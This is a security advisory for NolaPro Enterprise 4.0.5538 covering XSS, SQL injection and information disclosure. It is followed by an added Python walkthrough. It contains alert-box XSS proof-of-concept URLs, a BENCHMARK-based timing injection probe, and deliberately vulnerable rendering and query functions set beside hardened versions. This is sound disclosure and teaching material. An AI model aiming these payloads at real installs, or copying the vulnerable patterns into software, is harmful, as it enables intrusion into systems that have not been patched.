NolaPro Enterprise 4.0.5538 Cross Site Scripting / SQL Injection

03 May 2010 | Reported by ekse | Type: packetstorm | Source: packetstormsecurity.com

NolaPro Enterprise 4.0.5538 Cross Site Scripting / SQL Injection discovered by Corelan Team

`Advisory : CORELAN-10-035  
Disclosure date : May 1st, 2010  
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-035  
  
00 : Vulnerability information  
  
Product : NolaPro Enterprise  
Version : 4.0.5538  
Vendor : Noguska LLC   
URL : http://www.nolapro.com  
Platform : Windows (PHP/MySQL)  
Type of vulnerabilities : SQL Injection, Cross-Site Scripting, Information Disclosure  
Risk rating : Medium  
Issue fixed in version : 4.0.5720   
Vulnerability discovered by : ekse  
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/  
  
  
01 : Vendor description of software  
  
From the vendor website:  
"NolaPro is a premium, completely free web-based accounting suite. It includes AP, AR,  
Payroll, Order Tracking, Inventory Control, POS, B2B, and an Ecom Shopping Cart."  
  
  
02 : Vulnerability details  
  
Corelan Team has found 3 types of vulnerabilities in NolaPro:  
- Cross-Site Scripting (XSS)  
- SQL Injection  
- Information Disclosure  
  
Cross-Site Scripting  
--------------------  
  
We have found 3 instances of Cross-Site Scripting in NolaPro, one of which does not  
require authentication. Note that since Cross-Site Scripting executes in the victim's  
browser, requiring authentication does not reduce the risk: the payload runs against  
whichever logged-in user follows the link. The requirement is indicated solely to  
facilitate reproducing the bugs.  
  
XSS #1  
Script: example.php   Parameter: file   Request: POST   Auth required: No  
  
XSS #2  
Script: sidemenu.php   Parameter: menutitle   Request: GET   Auth required: Yes  
  
XSS #3  
Script: nporderitemremote.php   Parameter: linenum   Request: GET   Auth required: Yes  
  
We provide a proof-of-concept for each of these bugs. The examples are harmless and only  
display an alert box in the browser.  
  
XSS #1  
Because this is a POST request, the easiest way to reproduce the bug is to submit the  
following string in the file field of the example.php page:  
  
<script>alert(String.fromCharCode(88,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109));</script>  
  
XSS #2  
http://nolapro_server/sidemenu.php?index=1&menutitle=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS  
  
XSS #3  
http://nolapro_server/nporderitemremote.php?pos_mode=1&currency=USD&curdate=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&inventorylocationid=1&customerid=&shiptoid=0  
  
SQL Injection  
-------------  
We found one instance of SQL Injection in NolaPro. The vulnerable script is  
invitemlstreorder.php and the parameter is vendorid.  
To reproduce the bug, first enter the value 1 in the ID box on the invitemlstreorder.php  
page. The server should respond almost instantly. Now enter the following value:  
  
1 or BENCHMARK(2500000,MD5(1))  
  
The server should now take noticeably longer to respond (if the delay is too short to  
notice, increase the 2500000 value). BENCHMARK() returns 0, so the query still matches  
ID 1 and the page content is unchanged; the delay is the only sign that the value is  
embedded unmodified in the SQL statement, which is why a time-based test is used.  
  
Information Disclosure  
----------------------  
The checkfile.php script reveals whether a given file exists on the server. An attacker  
could use this to map the installation and prepare a targeted attack. Access to this  
script should require authentication and be restricted to administrators.  
  
03 : Vendor communication  
  
April 18th, 2010 : vendor contacted  
April 19th, 2010 : vendor replied  
April 21st, 2010 : new version available  
May 1st, 2010 : public disclosure  
  
Corelan Team wants to thank Noguska for their great response and handling of the issues  
disclosed.  
`
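The XSS and SQL Injection sections above, rebuilt as one added example that is not code from the advisory or from NolaPro itself. It uses the XSS #2 proof-of-concept URL copied from the advisory against a stand-in for sidemenu.php (the vulnerable reflection of menutitle beside an output-encoded version, plus a decoder that shows what the String.fromCharCode payload displays), and a stand-in for the invitemlstreorder.php vendorid lookup with the BENCHMARK timing probe the advisory describes, doubling the iteration count as the advisory suggests when the delay is too short. Only the script and parameter names come from the advisory; the HTML fragment, the vendors table and its rows, the use of SQLite with Python UDFs in place of MySQL's BENCHMARK() and MD5(), and every function name are assumptions made for this example.

```python
"""Added example: stand-ins for two NolaPro scripts named in the advisory.
Assumed for the example: the HTML fragment, the vendors table and its rows,
and SQLite with Python UDFs standing in for MySQL's BENCHMARK() and MD5()."""
import hashlib
import html
import re
import sqlite3
import time
from urllib.parse import unquote_plus, urlsplit

# PoC URL for XSS #2, copied from the advisory.
XSS2_URL = ("http://nolapro_server/sidemenu.php?index=1&menutitle=%3Cscript%3Ealert%28"
            "String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,98,121,32,67,111,"
            "114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS")

def query_params(url):
    """Decode the query string the way the server does: one urldecode per key and value."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def decode_fromcharcode(payload):
    """Recover the text an alert(String.fromCharCode(...)) payload displays. The numeric
    form needs no quote characters, so PHP's magic_quotes_gpc of that era cannot mangle it."""
    nums = re.search(r"fromCharCode\(([\d,]+)\)", payload).group(1)
    return "".join(chr(int(n)) for n in nums.split(","))

def render_title_vulnerable(menutitle):
    # The bug class: the request parameter is written into the HTML response unencoded.
    return '<div class="menutitle">%s</div>' % menutitle

def render_title_hardened(menutitle):
    # Fix: HTML-encode on output; quote=True also covers attribute contexts.
    return '<div class="menutitle">%s</div>' % html.escape(menutitle, quote=True)

VENDOR_ROWS = [(1, "Acme Supply"), (2, "Globex"), (3, "Initech")]  # constructed rows

def _md5(value):
    return hashlib.md5(str(value).encode()).hexdigest()

def _benchmark(count, expr):
    # MySQL's BENCHMARK(count, expr) evaluates expr count times and returns 0. SQLite
    # hands us expr already evaluated, so burn equivalent CPU by re-hashing it.
    data = str(expr).encode()
    for _ in range(int(count)):
        data = hashlib.md5(data).digest()
    return 0

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("MD5", 1, _md5)
    conn.create_function("BENCHMARK", 2, _benchmark)
    conn.execute("CREATE TABLE vendors (vendorid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO vendors VALUES (?, ?)", VENDOR_ROWS)
    return conn

def lookup_vulnerable(conn, vendorid):
    # The bug class: the value from the ID box is concatenated into the query text.
    sql = "SELECT name FROM vendors WHERE vendorid = " + vendorid
    return [row[0] for row in conn.execute(sql)]

def lookup_hardened(conn, vendorid):
    # Fix: enforce the type, then bind it. The payload fails int() before any SQL runs.
    vid = int(vendorid)
    rows = conn.execute("SELECT name FROM vendors WHERE vendorid = ?", (vid,))
    return [row[0] for row in rows]

def hardened_rejects(conn, vendorid):
    try:
        lookup_hardened(conn, vendorid)
    except ValueError:
        return True
    return False

def _timed(fn, *args):
    start = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - start

def probe_time_based(conn, iterations=50000, min_delay=0.05, max_iterations=4000000):
    """The advisory's check: time the baseline value 1, then '1 or BENCHMARK(n,MD5(1))',
    doubling n until the delay is unmistakable. BENCHMARK() returns 0, so both requests
    return the same rows; only the timing differs. Returns (n, baseline_s, delayed_s, ok)."""
    base_rows, baseline = _timed(lookup_vulnerable, conn, "1")
    delayed = baseline
    while iterations <= max_iterations:
        payload = "1 or BENCHMARK(%d,MD5(1))" % iterations
        rows, delayed = _timed(lookup_vulnerable, conn, payload)
        if rows == base_rows and delayed - baseline >= min_delay:
            return iterations, baseline, delayed, True
        iterations *= 2
    return iterations, baseline, delayed, False
```

`decode_fromcharcode(query_params(XSS2_URL)["menutitle"])` shows the alert text the three PoCs display, and `render_title_hardened` shows that encoding at the output point neutralises the payload without rejecting any input. `probe_time_based(open_db())` runs the baseline-then-payload comparison; because `BENCHMARK()` returns 0 the row set is identical in both requests, so the delay is the only signal, and the doubling loop is the programmatic form of the advisory's advice to raise the iteration count when the delay is too short. `lookup_hardened` rejects the payload before any SQL is built, which is the fix the page's "issue fixed in version" line implies.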
